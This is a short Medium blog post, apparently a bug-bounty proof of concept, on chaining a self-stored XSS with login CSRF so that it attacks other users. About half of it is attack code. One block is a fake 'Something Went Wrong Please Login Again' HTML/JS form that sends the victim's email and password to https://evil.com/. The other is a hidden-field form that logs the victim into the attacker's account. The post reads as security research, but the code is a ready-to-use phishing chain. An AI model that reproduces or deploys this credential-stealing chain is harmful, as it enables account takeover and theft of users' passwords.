Self XSS To Evil XSS

Saad Ahmed

Hi guy I hope you all are fine this POC is all about how I convert the Self XSS To Evil XSS so let assume the site PRIVATE.COM

The first step simply sign-up and login to the account & start playing with the change account details functionality after some time I find out that the first name field is vulnerable to xss but the problem is this is self stored xss so I need to convert this xss to exploit other users I check the 1st method through CSRF but there is a CSRF token in the account update functionality so this method fail & then I remember GEEK BOY POC.

So simple created the html + js code to steal email & pass of victim.

<!DOCTYPE html>
<html>
<head>
<title>XSS</title>
</head>
<body>

<center><div class="panel-body">
<h3>Something Went Wrong Please Login Again</h3>

<div class="login-group">
<label for="email" class="control-label">Email</label>
<input id="Vemail" class="input span12" name="email" required="" type="email" value="" autofocus="">
</div>

<div class="login-group">
<label for="password" class="control-label">Password</label>
<input id="Vpass" class="input span12" name="password" required="" type="password" value="">
<div class="alert alert-error error hide" id="error_missingPassword">Please enter your password</div>
</div>

<button class="action-button btn btn-primary login-button" buttontype="login" type="submit" onclick="myFunction()">Login</button>

</div>


<script>
function myFunction() {
var x = document.getElementById("Vemail").value;
var y = document.getElementById("Vpass").value;
var pwd = x + ":" + y;
alert(pwd);
window.location = "https://evil.com/" + pwd;
}
</script>



</body>
</html>

This is a simple html code with 2 input fields with 1 button asking for Email and Password & the JS code simply get the input field value & send it to attacker server and upload the code the web host.

Simply use I frame to load the code from web host.

This is how i look like.

Everything is good now all I need is to send the user this form.

<html>
<body>
<form action="https://attacker.com/login/submit" method="POST">
<input type="hidden" name="email" value="email@gmail.com" />
<input type="hidden" name="password" value="password" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

This is simply make victim to login in my account without knowing him & when he login in my account he see the msg Something Went Wrong with input fields & try to login when he try the JS code simply get the email & pass victim enter and send it to attacker server

I hope you like it :)

./Logout

Saad Ahmed

Written by

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade